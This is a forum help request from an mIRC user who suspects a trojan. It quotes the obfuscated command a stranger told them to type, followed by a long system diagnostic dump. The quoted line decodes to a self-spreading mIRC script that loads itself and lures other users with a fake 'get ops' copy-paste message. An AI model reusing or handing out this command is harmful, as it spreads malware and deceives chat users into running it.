
View Full Version : suspected mirc backdoor thin help eurgent


pneboy
11-05-09, 14:57
I think that someone might have tricked me into installing a trojan into my computer through the use of mIRC. He told me to type this, if it helps:

[14:32] type this hack will give u ops //write * $decode(b24gMTp0ZXh0OiphKjojOnsgLmlnbm9yZSAkbmljay B8IC50aW1lcqAgMCAxMjAgLmpvaW4gfCAubXNnICRuaWNrIERv IFlvdSBXYW50IHRvIGJlIGFuIE9QRVJBVE9SIGluICRjaGFuID 8gY29weS9wYXN0ZSB0aGlzLT4DMTQgLy93cml0ZSCgICQgJCsg ZGVjb2RlKCAkKyAkZW5jb2RlKCRyZWFkKCRzY3JpcHQsbiwxKS xtKSAkKyAsbSkgJGNocigxMjQpIC5sb2FkIC1ycyCgICRjaHIo MTI0KSAvL21vZGUgJCAkKyBtZSArUiB9,m) | .load -rs * | //mo

diagnose.exe

------------------------------------------------------
Diagnostic tool developed for www.tombraiderforums.com
------------------------------------------------------
Version : 3.12
Author : Simulation

Select All (Ctrl A) then Copy (Ctrl C) and paste (Ctrl V) the text in Notepad into a reply on the forum.

Operating System

Windows Vista Home Basic Edition 32bit Service Pack 1 build 6001

COMMAND.COM
COMMAND.COM has been installed

Autoexec.NT
@echo off
lh %SystemRoot%\system32\mscdexnt.exe
lh %SystemRoot%\system32\redir
lh %SystemRoot%\system32\dosx
SET BLASTER=A220 I5 D1 P330 T3

Config.NT
dos=high, umb
device=%SystemRoot%\system32\himem.sys
files=40

Programs Currently Running

Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 Services 0 24 K
System 4 Services 0 7,036 K
smss.exe 440 Services 0 104 K
csrss.exe 508 Services 0 1,520 K
wininit.exe 552 Services 0 108 K
csrss.exe 564 Console 1 2,924 K
services.exe 604 Services 0 1,780 K
lsass.exe 620 Services 0 2,224 K
lsm.exe 628 Services 0 1,280 K
winlogon.exe 748 Console 1 1,012 K
svchost.exe 896 Services 0 3,616 K
svchost.exe 960 Services 0 4,072 K
svchost.exe 996 Services 0 4,680 K
svchost.exe 1088 Services 0 3,788 K
svchost.exe 1120 Services 0 47,772 K
svchost.exe 1148 Services 0 12,840 K
audiodg.exe 1252 Services 0 11,312 K
SLsvc.exe 1288 Services 0 128 K
svchost.exe 1324 Services 0 2,304 K
svchost.exe 1480 Services 0 4,528 K
spoolsv.exe 1648 Services 0 2,064 K
svchost.exe 1672 Services 0 3,484 K
avgwdsvc.exe 1928 Services 0 1,832 K
mDNSResponder.exe 1952 Services 0 368 K
iviRegMgr.exe 2028 Services 0 68 K
svchost.exe 320 Services 0 124 K
svchost.exe 380 Services 0 164 K
TestHandler.exe 480 Services 0 428 K
svchost.exe 432 Services 0 896 K
SearchIndexer.exe 1140 Services 0 10,540 K
avgemc.exe 292 Services 0 792 K
avgrsx.exe 1560 Services 0 16,964 K
avgcsrvx.exe 2252 Services 0 60 K
taskeng.exe 2664 Console 1 2,112 K
dwm.exe 2700 Console 1 63,564 K
MSASCui.exe 2952 Console 1 1,548 K
igfxtray.exe 2996 Console 1 284 K
hkcmd.exe 3012 Console 1 1,132 K
igfxpers.exe 3028 Console 1 292 K
RtHDVCpl.exe 3040 Console 1 756 K
HotkeyApp.exe 3048 Console 1 1,092 K
SynTPStart.exe 3056 Console 1 264 K
igfxsrvc.exe 3104 Console 1 2,048 K
avgtray.exe 3128 Console 1 1,012 K
jusched.exe 3176 Console 1 244 K
GrooveMonitor.exe 3200 Console 1 1,240 K
iTunesHelper.exe 3216 Console 1 480 K
sidebar.exe 3280 Console 1 1,548 K
daemon.exe 3336 Console 1 736 K
SynTPEnh.exe 3984 Console 1 1,156 K
WisLMSvc.exe 956 Services 0 1,364 K
WmiPrvSE.exe 692 Services 0 2,880 K
sidebar.exe 2788 Console 1 1,204 K
sidebar.exe 2840 Console 1 800 K
iPodService.exe 4060 Services 0 1,008 K
taskeng.exe 3308 Services 0 460 K
csrss.exe 4368 2 484 K
winlogon.exe 5572 2 132 K
taskeng.exe 4876 2 672 K
dwm.exe 3228 2 228 K
MSASCui.exe 4176 2 1,296 K
hkcmd.exe 3604 2 1,008 K
igfxpers.exe 5444 2 268 K
RtHDVCpl.exe 5500 2 412 K
HotkeyApp.exe 5304 2 916 K
SynTPStart.exe 5924 2 208 K
GoogleDesktop.exe 4268 2 828 K
avgtray.exe 3420 2 772 K
jusched.exe 1192 2 236 K
GrooveMonitor.exe 4976 2 1,224 K
iTunesHelper.exe 1872 2 208 K
sidebar.exe 5648 2 1,880 K
daemon.exe 5900 2 512 K
SynTPEnh.exe 4960 2 272 K
igfxsrvc.exe 1512 2 2,036 K
explorer.exe 5156 Console 1 48,256 K
taskeng.exe 5252 Console 1 436 K
RapidshareAutoDownloader. 7828 Console 1 18,972 K
GoogleUpdate.exe 4984 Console 1 300 K
msfeedssync.exe 6832 Console 1 900 K
avgnsx.exe 700 Services 0 428 K
msfeedssync.exe 3816 2 804 K
SUPER.exe 6116 2 1,500 K
explorer.exe 3652 2 3,592 K
LogonUI.exe 5340 2 160 K
wuauclt.exe 4104 Console 1 228 K
wmpnetwk.exe 7248 Services 0 892 K
AppleMobileDeviceService. 668 Services 0 176 K
firefox.exe 6932 Console 1 77,220 K
ObjectDock.exe 6404 Console 1 4,852 K
wmpnscfg.exe 7868 2 1,452 K
wmpnscfg.exe 6332 Console 1 432 K
avgui.exe 6820 Console 1 5,652 K
avgscanx.exe 6636 Console 1 2,176 K
avgcsrvx.exe 4780 Console 1 33,920 K
taskeng.exe 7756 Services 0 4,024 K
SearchProtocolHost.exe 6088 Services 0 7,880 K
SearchFilterHost.exe 6288 Services 0 5,128 K
diagnose.exe 4460 Console 1 8,156 K
ns703B.tmp 7304 Console 1 4,468 K
cmd.exe 7420 Console 1 2,012 K
tasklist.exe 1236 Console 1 6,552 K
notepad.exe 1944 Console 1 7,336 K
WmiPrvSE.exe 5184 Services 0 5,768 K

System Event Log - Warning and Errors Only (last 24hrs)

Event Log from 08:00am on the 10/05/2009

Tomb Raider Game Setup Information

Tomb Raider 1 Installed
TOMB.EXE File Size = 873739 bytes - Glide Emulator version installed by ATR Installer


trai.dat not found


hmiset.cfg

[DIGITAL]
DeviceName = Sound Blaster 16/AWE32
DeviceIRQ = 7
DeviceDMA = 1
DevicePort = 0x220
DeviceID = 0xe016

[MIDI]
DeviceName = No MIDI Device
DevicePort = 0xffffffff
DeviceID = 0xffffffff

NTVDM.EXE .COM
NTVDM.EXE has been installed

VDMSound
VDMSound is not installed
VLP Files on Desktop
VLP files are NOT present on Desktop



VLP Files in C:\TOMBRAID
VLP files are NOT present in c:\tombraid


Tomb Raider 1 Gold - Unfinished Business Installed
TOMBUB.EXE File Size = 867563 bytes - Glide Emulator version installed


Tomb Raider II Installed
Installed in C:\Program Files\Core Design
Compatibility Layer Disabled
Tomb2.exe File Size = 944640 bytes - Unknown version (29159397-921047808)
C:\Program Files\Core Design\winplay.dll - File Not Found
C:\Windows\System32\winplay.dll - Version 2.0.0.12
C:\Program Files\Core Design\winstr.dll - File Not Found
C:\Windows\System32\winstr.dll - Version 2.0.0.13

Tomb Raider III Installed
Installed in C:\Program Files\Core Design\Tomb Raider III
Compatibility Layer Disabled
Tomb3.exe File Size = 966656 bytes - Unknown version (29236700-777930496)
C:\Program Files\Core Design\Tomb Raider III\winplay.dll - Version 2.0.0.6
C:\Windows\System32\winplay.dll - Version 2.0.0.12
C:\Program Files\Core Design\Tomb Raider III\winstr.dll - Version 2.0.0.4
C:\Windows\System32\winstr.dll - Version 2.0.0.13

Tomb Raider - The Lost Artifact Installed
Installed in C:\Program Files\Core Design\Tomb Raider - The Lost Artifact
Compatibility Layer Enabled = WIN98
tr3gold.exe File Size = 946176 bytes - Unknown version (29449555393246720)
C:\Program Files\Core Design\Tomb Raider - The Lost Artifact\winplay.dll - Version 1.0.0.1
C:\Windows\System32\winplay.dll - Version 2.0.0.12
C:\Program Files\Core Design\Tomb Raider - The Lost Artifact\winstr.dll - Version 1.0.0.1
C:\Windows\System32\winstr.dll - Version 2.0.0.13

Tomb Raider - The Last Revelation Installed
Installed in C:\Program Files\Core Design\Tomb Raider - The Last Revelation
Compatibility Layer Disabled
TOMB4.EXE File Size = 790528 bytes - Unkown version (295323781376890112)

Tomb Raider - Angel of Darkness Installed
Installed in C:\Program Files\Eidos Interactive\TRAOD
Compatibility Layer Disabled


DirectX Diagnostics Report

------------------
System Information
------------------
Time of this report: 5/11/2009, 15:54:09
Machine name: USER-PC
Operating System: Windows Vista™ Home Basic (6.0, Build 6001) Service Pack 1 (6001.vistasp1_gdr.080917-1612)
Language: English (Regional Setting: English)
System Manufacturer: FUJITSU SIEMENS
System Model: AMILO Li 2727
BIOS: Ver 1.00PARTTBLM
Processor: n/a
Memory: 1014MB RAM
Page File: 1753MB used, 790MB available
Windows Dir: C:\Windows
DirectX Version: DirectX 10
DX Setup Parameters: Not found
DxDiag Version: 6.00.6001.18000 32bit Unicode

------------
DxDiag Notes
------------
Display Tab 1: No problems found.
Sound Tab 1: No problems found.
Input Tab: No problems found.

--------------------
DirectX Debug Levels
--------------------
Direct3D: 0/4 (retail)
DirectDraw: 0/4 (retail)
DirectInput: 0/5 (retail)
DirectMusic: 0/5 (retail)
DirectPlay: 0/9 (retail)
DirectSound: 0/5 (retail)
DirectShow: 0/6 (retail)

---------------
Display Devices
---------------
Card name: Mobile Intel(R) 965 Express Chipset Family
Manufacturer: Intel Corporation
Chip type: Mobile Intel(R) 965 Express Chipset Family
DAC type: Internal
Device Key: Enum\PCI\VEN_8086&DEV_2A02&SUBSYS_11231734&REV_03
Display Memory: 251 MB
Dedicated Memory: 0 MB
Shared Memory: 251 MB
Current Mode: 1280 x 800 (32 bit) (60Hz)
Monitor: Generic PnP Monitor
Driver Name: igdumd32.dll
Driver Version: 7.14.0010.1283 (English)
DDI Version: 9Ex
Driver Attributes: Final Retail
Driver Date/Size: 5/31/2007 09:51:14, 2551808 bytes
WHQL Logo'd: n/a
WHQL Date Stamp: n/a
Device Identifier: {D7B78E66-6942-11CF-8771-2931A2C2CA35}
Vendor ID: 0x8086
Device ID: 0x2A02
SubSys ID: 0x11231734
Revision ID: 0x0003
Video Accel: ModeMPEG2_A ModeMPEG2_C
DDraw Status: Enabled
D3D Status: Enabled
AGP Status: Enabled

-------------
Sound Devices
-------------
Description: Speakers (Realtek High Definition Audio)
Default Sound Playback: Yes
Default Voice Playback: Yes
Hardware ID: HDAUDIO\FUNC_01&VEN_10EC&DEV_0268&SUBSYS_17341123&REV_1000
Manufacturer ID: 1
Product ID: 100
Type: WDM
Driver Name: RTKVHDA.sys
Driver Version: 6.00.0001.5449 (English)
Driver Attributes: Final Retail
WHQL Logo'd: n/a
Date and Size: 7/18/2007 18:32:40, 1841312 bytes
Other Files:
Driver Provider: Realtek Semiconductor Corp.
HW Accel Level: Basic
Cap Flags: 0x0
Min/Max Sample Rate: 0, 0
Static/Strm HW Mix Bufs: 0, 0
Static/Strm HW 3D Bufs: 0, 0
HW Memory: 0
Voice Management: No
EAX(tm) 2.0 Listen/Src: No, No
I3DL2(tm) Listen/Src: No, No
Sensaura(tm) ZoomFX(tm): No

---------------------
Sound Capture Devices
---------------------
-------------------
DirectInput Devices
-------------------
Device Name: Mouse
Attached: 1
Controller ID: n/a
Vendor/Product ID: n/a
FF Driver: n/a

Device Name: Keyboard
Attached: 1
Controller ID: n/a
Vendor/Product ID: n/a
FF Driver: n/a

Poll w/ Interrupt: No

-----------
USB Devices
-----------
+ USB Root Hub
| Vendor/Product ID: 0x8086, 0x2831
| Matching Device ID: usb\root_hub
| Service: usbhub
| Driver: usbhub.sys, 1/21/2008 03:32:24, 194560 bytes
| Driver: usbd.sys, 1/21/2008 03:32:24, 5888 bytes

----------------
Gameport Devices
----------------

------------
PS/2 Devices
------------
+ Standard PS/2 Keyboard
| Matching Device ID: *pnp0303
| Service: i8042prt
| Driver: i8042prt.sys, 1/21/2008 03:32:45, 54784 bytes
| Driver: kbdclass.sys, 1/21/2008 03:32:49, 35384 bytes
|
+ Terminal Server Keyboard Driver
| Matching Device ID: root\rdp_kbd
| Upper Filters: kbdclass
| Service: TermDD
| Driver: i8042prt.sys, 1/21/2008 03:32:45, 54784 bytes
| Driver: kbdclass.sys, 1/21/2008 03:32:49, 35384 bytes
|
+ Synaptics PS/2 Port TouchPad
| Matching Device ID: *syn0310
| Upper Filters: SynTP
| Service: i8042prt
|
+ Terminal Server Mouse Driver
| Matching Device ID: root\rdp_mou
| Upper Filters: mouclass
| Service: TermDD
| Driver: termdd.sys, 1/21/2008 03:32:21, 54328 bytes
| Driver: sermouse.sys, 1/21/2008 03:32:45, 19968 bytes
| Driver: mouclass.sys, 1/21/2008 03:32:45, 34360 bytes

------------------------
Disk & DVD/CD-ROM Drives
------------------------
Drive: C:
Free Space: 12.8 GB
Total Space: 69.5 GB
File System: NTFS
Model: WDC WD1200BEVS-22UST0

Drive: D:
Free Space: 35.2 GB
Total Space: 36.0 GB
File System: NTFS
Model: WDC WD1200BEVS-22UST0

Drive: E:
Model: Optiarc DVD RW AD-7590A ATA Device
Driver: c:\windows\system32\drivers\cdrom.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:23, 67072 bytes

Drive: F:
Model: KTSVILO WXURC5Y SCSI CdRom Device
Driver: c:\windows\system32\drivers\cdrom.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:23, 67072 bytes

--------------
System Devices
--------------
Name: Mobile Intel(R) 965 Express Chipset Family
Device ID: PCI\VEN_8086&DEV_2A03&SUBSYS_11231734&REV_03\3&21436425&0&11
Driver: n/a

Name: Mobile Intel(R) 965 Express Chipset Family
Device ID: PCI\VEN_8086&DEV_2A02&SUBSYS_11231734&REV_03\3&21436425&0&10
Driver: C:\Windows\system32\DRIVERS\igdkmd32.sys, 7.14.0010.1283 (English), 5/31/2007 09:51:00, 1774080 bytes
Driver: C:\Windows\system32\igdumd32.dll, 7.14.0010.1283 (English), 5/31/2007 09:51:14, 2551808 bytes
Driver: C:\Windows\system32\igmedkrn.dll, 5/31/2007 09:49:06, 910464 bytes
Driver: C:\Windows\system32\iglhxs32.vp, 5/31/2007 10:35:28, 25632 bytes
Driver: C:\Windows\system32\iglhxo32.vp, 5/31/2007 08:55:48, 2096 bytes
Driver: C:\Windows\system32\iglhxc32.vp, 5/31/2007 08:55:48, 2096 bytes
Driver: C:\Windows\system32\hccutils.dll, 7.14.0010.1283 (English), 5/31/2007 09:00:24, 102400 bytes
Driver: C:\Windows\system32\igfxsrvc.dll, 7.14.0010.1283 (English), 5/31/2007 09:00:44, 47616 bytes
Driver: C:\Windows\system32\igfxsrvc.exe, 7.14.0010.1283 (English), 6/6/2007 10:52:30, 252696 bytes
Driver: C:\Windows\system32\igfxpph.dll, 7.14.0010.1283 (English), 5/31/2007 09:01:02, 204800 bytes
Driver: C:\Windows\system32\igfxcpl.cpl, 7.14.0010.1283 (English), 5/31/2007 09:00:52, 122880 bytes
Driver: C:\Windows\system32\igfxcfg.exe, 7.14.0010.1283 (English), 6/6/2007 10:52:16, 527128 bytes
Driver: C:\Windows\system32\igfxdev.dll, 7.14.0010.1283 (English), 5/31/2007 09:00:20, 200704 bytes
Driver: C:\Windows\system32\igfxdo.dll, 7.14.0010.1283 (English), 5/31/2007 09:00:32, 135168 bytes
Driver: C:\Windows\system32\igfxtray.exe, 7.14.0010.1283 (English), 6/6/2007 10:52:32, 142104 bytes
Driver: C:\Windows\system32\igfxzoom.exe, 7.14.0010.1283 (English), 6/6/2007 10:52:36, 170776 bytes
Driver: C:\Windows\system32\hkcmd.exe, 7.14.0010.1283 (English), 6/6/2007 10:52:12, 154392 bytes
Driver: C:\Windows\system32\igfxress.dll, 7.14.0010.1283 (English), 5/31/2007 09:00:08, 3293184 bytes
Driver: C:\Windows\system32\igfxpers.exe, 7.14.0010.1283 (English), 6/6/2007 10:52:26, 138008 bytes
Driver: C:\Windows\system32\igfxTMM.dll, 1.00.0000.0001 (English), 5/31/2007 09:01:22, 249856 bytes
Driver: C:\Windows\system32\igfxext.exe, 7.14.0010.1283 (English), 6/6/2007 10:52:20, 166680 bytes
Driver: C:\Windows\system32\igfxexps.dll, 7.14.0010.1283 (English), 5/31/2007 09:00:54, 24576 bytes
Driver: C:\Windows\system32\oemdspif.dll, 7.14.0010.1283 (English), 5/31/2007 09:01:10, 69632 bytes
Driver: C:\Windows\system32\igfxrara.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:44, 159744 bytes
Driver: C:\Windows\system32\igfxrchs.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:44, 110592 bytes
Driver: C:\Windows\system32\igfxrcht.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:44, 110592 bytes
Driver: C:\Windows\system32\igfxrdan.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:44, 172032 bytes
Driver: C:\Windows\system32\igfxrdeu.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:44, 192512 bytes
Driver: C:\Windows\system32\igfxrenu.lrc, 7.14.0010.1283 (English), 5/31/2007 09:00:08, 172032 bytes
Driver: C:\Windows\system32\igfxresp.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:44, 188416 bytes
Driver: C:\Windows\system32\igfxrfin.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:46, 176128 bytes
Driver: C:\Windows\system32\igfxrfra.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:46, 184320 bytes
Driver: C:\Windows\system32\igfxrheb.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:46, 155648 bytes
Driver: C:\Windows\system32\igfxrita.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:46, 188416 bytes
Driver: C:\Windows\system32\igfxrjpn.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:46, 131072 bytes
Driver: C:\Windows\system32\igfxrkor.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:46, 126976 bytes
Driver: C:\Windows\system32\igfxrnld.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:46, 188416 bytes
Driver: C:\Windows\system32\igfxrnor.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:48, 172032 bytes
Driver: C:\Windows\system32\igfxrplk.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:48, 180224 bytes
Driver: C:\Windows\system32\igfxrptb.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:48, 180224 bytes
Driver: C:\Windows\system32\igfxrptg.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:48, 180224 bytes
Driver: C:\Windows\system32\igfxrrus.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:48, 180224 bytes
Driver: C:\Windows\system32\igfxrsky.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:48, 176128 bytes
Driver: C:\Windows\system32\igfxrslv.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:48, 172032 bytes
Driver: C:\Windows\system32\igfxrsve.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:48, 172032 bytes
Driver: C:\Windows\system32\igfxrtha.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:50, 163840 bytes
Driver: C:\Windows\system32\igfxrcsy.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:44, 176128 bytes
Driver: C:\Windows\system32\igfxrell.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:44, 192512 bytes
Driver: C:\Windows\system32\igfxrhun.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:46, 180224 bytes
Driver: C:\Windows\system32\igfxrtrk.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:50, 172032 bytes
Driver: C:\Windows\system32\ig4icd32.dll, 7.14.0010.1283 (English), 5/31/2007 09:16:06, 2392064 bytes
Driver: C:\Windows\system32\ig4dev32.dll, 7.14.0010.1283 (English), 5/31/2007 09:11:32, 1589248 bytes
Driver: C:\Windows\system32\igfxCoIn_v1283.dll, 5/31/2007 10:14:00, 204800 bytes

Name: Mobile Intel(R) PM965/GM965/GL960 Express Processor to DRAM Controller - 2A00
Device ID: PCI\VEN_8086&DEV_2A00&SUBSYS_11231734&REV_03\3&21436425&0&00
Driver: n/a

Name: Intel(R) ICH8M Ultra ATA Storage Controllers - 2850
Device ID: PCI\VEN_8086&DEV_2850&SUBSYS_11231734&REV_03\3&21436425&0&F9
Driver: C:\Windows\system32\DRIVERS\intelide.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:21, 17976 bytes
Driver: C:\Windows\system32\DRIVERS\pciidex.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:21, 45112 bytes
Driver: C:\Windows\system32\DRIVERS\atapi.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:21, 21560 bytes
Driver: C:\Windows\system32\DRIVERS\ataport.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:21, 110136 bytes

Name: High Definition Audio Controller
Device ID: PCI\VEN_8086&DEV_284B&SUBSYS_11231734&REV_03\3&21436425&0&D8
Driver: C:\Windows\system32\DRIVERS\hdaudbus.sys, 6.00.6001.17036 (English), 1/21/2008 03:32:47, 53760 bytes

Name: Intel(R) ICH8 Family PCI Express Root Port 3 - 2843
Device ID: PCI\VEN_8086&DEV_2843&SUBSYS_11231734&REV_03\3&21436425&0&E2
Driver: C:\Windows\system32\DRIVERS\pci.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:22, 151096 bytes

Name: Intel(R) ICH8 Family PCI Express Root Port 2 - 2841
Device ID: PCI\VEN_8086&DEV_2841&SUBSYS_11231734&REV_03\3&21436425&0&E1
Driver: C:\Windows\system32\DRIVERS\pci.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:22, 151096 bytes

Name: Intel(R) ICH8 Family PCI Express Root Port 1 - 283F
Device ID: PCI\VEN_8086&DEV_283F&SUBSYS_11231734&REV_03\3&21436425&0&E0
Driver: C:\Windows\system32\DRIVERS\pci.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:22, 151096 bytes

Name: Intel(R) ICH8 Family SMBus Controller - 283E
Device ID: PCI\VEN_8086&DEV_283E&SUBSYS_11231734&REV_03\3&21436425&0&FB
Driver: n/a

Name: Intel(R) ICH8 Family USB2 Enhanced Host Controller - 283A
Device ID: PCI\VEN_8086&DEV_283A&SUBSYS_11231734&REV_03\3&21436425&0&D7
Driver: C:\Windows\system32\drivers\usbehci.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 39424 bytes
Driver: C:\Windows\system32\drivers\usbport.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 226304 bytes
Driver: C:\Windows\system32\drivers\usbhub.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 194560 bytes
Driver: C:\Windows\system32\hccoin.dll, 6.00.6000.16386 (English), 11/2/2006 10:46:05, 8704 bytes
Driver: C:\Windows\system32\hcrstco.dll, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 15872 bytes

Name: Intel(R) ICH8 Family USB2 Enhanced Host Controller - 2836
Device ID: PCI\VEN_8086&DEV_2836&SUBSYS_11231734&REV_03\3&21436425&0&EF
Driver: C:\Windows\system32\drivers\usbehci.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 39424 bytes
Driver: C:\Windows\system32\drivers\usbport.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 226304 bytes
Driver: C:\Windows\system32\drivers\usbhub.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 194560 bytes
Driver: C:\Windows\system32\hccoin.dll, 6.00.6000.16386 (English), 11/2/2006 10:46:05, 8704 bytes
Driver: C:\Windows\system32\hcrstco.dll, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 15872 bytes

Name: Intel(R) ICH8 Family USB Universal Host Controller - 2835
Device ID: PCI\VEN_8086&DEV_2835&SUBSYS_11231734&REV_03\3&21436425&0&D1
Driver: C:\Windows\system32\drivers\usbuhci.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 23552 bytes
Driver: C:\Windows\system32\drivers\usbport.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 226304 bytes
Driver: C:\Windows\system32\drivers\usbhub.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 194560 bytes

Name: Intel(R) ICH8 Family USB Universal Host Controller - 2834
Device ID: PCI\VEN_8086&DEV_2834&SUBSYS_11231734&REV_03\3&21436425&0&D0
Driver: C:\Windows\system32\drivers\usbuhci.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 23552 bytes
Driver: C:\Windows\system32\drivers\usbport.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 226304 bytes
Driver: C:\Windows\system32\drivers\usbhub.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 194560 bytes

Name: Intel(R) ICH8 Family USB Universal Host Controller - 2832
Device ID: PCI\VEN_8086&DEV_2832&SUBSYS_11231734&REV_03\3&21436425&0&EA
Driver: C:\Windows\system32\drivers\usbuhci.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 23552 bytes
Driver: C:\Windows\system32\drivers\usbport.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 226304 bytes
Driver: C:\Windows\system32\drivers\usbhub.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 194560 bytes

Name: Intel(R) ICH8 Family USB Universal Host Controller - 2831
Device ID: PCI\VEN_8086&DEV_2831&SUBSYS_11231734&REV_03\3&21436425&0&E9
Driver: C:\Windows\system32\drivers\usbuhci.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 23552 bytes
Driver: C:\Windows\system32\drivers\usbport.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 226304 bytes
Driver: C:\Windows\system32\drivers\usbhub.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 194560 bytes

Name: Intel(R) ICH8 Family USB Universal Host Controller - 2830
Device ID: PCI\VEN_8086&DEV_2830&SUBSYS_11231734&REV_03\3&21436425&0&E8
Driver: C:\Windows\system32\drivers\usbuhci.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 23552 bytes
Driver: C:\Windows\system32\drivers\usbport.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 226304 bytes
Driver: C:\Windows\system32\drivers\usbhub.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:24, 194560 bytes

Name: Intel(R) 82801HEM/HBM SATA AHCI Controller
Device ID: PCI\VEN_8086&DEV_2829&SUBSYS_11231734&REV_03\3&21436425&0&FA
Driver: C:\Windows\system32\DRIVERS\iaStor.sys, 7.05.0000.1017 (English), 3/21/2007 11:58:56, 304920 bytes

Name: Intel(R) ICH8M LPC Interface Controller - 2815
Device ID: PCI\VEN_8086&DEV_2815&SUBSYS_11231734&REV_03\3&21436425&0&F8
Driver: C:\Windows\system32\DRIVERS\msisadrv.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:22, 16440 bytes

Name: Intel(R) 82801 PCI Bridge - 2448
Device ID: PCI\VEN_8086&DEV_2448&SUBSYS_11231734&REV_F3\3&21436425&0&F0
Driver: C:\Windows\system32\DRIVERS\pci.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:22, 151096 bytes

Name: Atheros AR5007EG Wireless Network Adapter
Device ID: PCI\VEN_168C&DEV_001C&SUBSYS_3067168C&REV_04\4&2347B994&0&00E2
Driver: C:\Windows\system32\DRIVERS\athr.sys, 7.03.0001.0042 (English), 6/18/2007 17:03:32, 737280 bytes

Name: Realtek RTL8101E Family PCI-E Fast Ethernet NIC (NDIS 6.0)
Device ID: PCI\VEN_10EC&DEV_8136&SUBSYS_11231734&REV_01\4&1981078&0&00E0
Driver: C:\Windows\system32\DRIVERS\Rtlh86.sys, 6.196.0803.2007 (English), 8/3/2007 09:44:58, 91648 bytes

------------------
DirectShow Filters
------------------

DirectShow Filters:
InterVideo G726Dec DMO,0x00600800,1,1,,
WMAudio Decoder DMO,0x00800800,1,1,,
WMAPro over S/PDIF DMO,0x00600800,1,1,,
WMSpeech Decoder DMO,0x00600800,1,1,,
MP3 Decoder DMO,0x00600800,1,1,,
Mpeg4s Decoder DMO,0x00800001,1,1,,
WMV Screen decoder DMO,0x00600800,1,1,,
WMVideo Decoder DMO,0x00800001,1,1,,
Mpeg43 Decoder DMO,0x00800001,1,1,,
Mpeg4 Decoder DMO,0x00800001,1,1,,
Ulead Full TS To Partial TS,0x00200000,1,1,ulFullTS2PartialTS.ax,1.00.0000. 0008
InterVideo Video Decoder,0x00700000,2,4,IVIVIDEO.ax,8.00.0006.0193
ffdshow Video Decoder,0xff800001,2,1,ffdshow.ax,1.00.0005.2052
Full Screen Renderer,0x00200000,1,0,,6.06.6001.18063
CoreAVC Video Decoder,0x00600000,1,1,AVCDX.ax,0.00.0000.0004
Dirac Source,0x00600000,0,0,DiracSplitter.ax,1.00.0000.0 000
ffdshow raw video filter,0x00200000,2,1,ffdshow.ax,1.00.0005.2052
Multiple File Output,0x00200000,2,2,WMM2FILT.dll,
WMT Black Frame Generator,0x00200000,1,1,WMM2FILT.dll,
ffdshow Audio Decoder,0x3fffffff,1,1,ffdshow.ax,1.00.0005.2052
WMT Import Filter,0x00200000,0,1,WMM2FILT.dll,
DV Muxer,0x00400000,0,0,,6.06.6001.18000
Color Space Converter,0x00400001,1,1,,6.06.6001.18063
WMT Interlacer,0x00200000,1,1,WMM2FILT.dll,
WM ASF Reader,0x00400000,0,0,,11.00.6001.7000
Screen Capture filter,0x00200000,0,1,wmpsrcwp.dll,11.00.6001.7000
AVI Splitter,0x00600000,1,1,,6.06.6001.18063
VGA 16 Color Ditherer,0x00400000,1,1,,6.06.6001.18063
Microsoft MPEG-2 Video Decoder,0x005fffff,2,4,msmpeg2vdec.dll,11.00.6001.7000
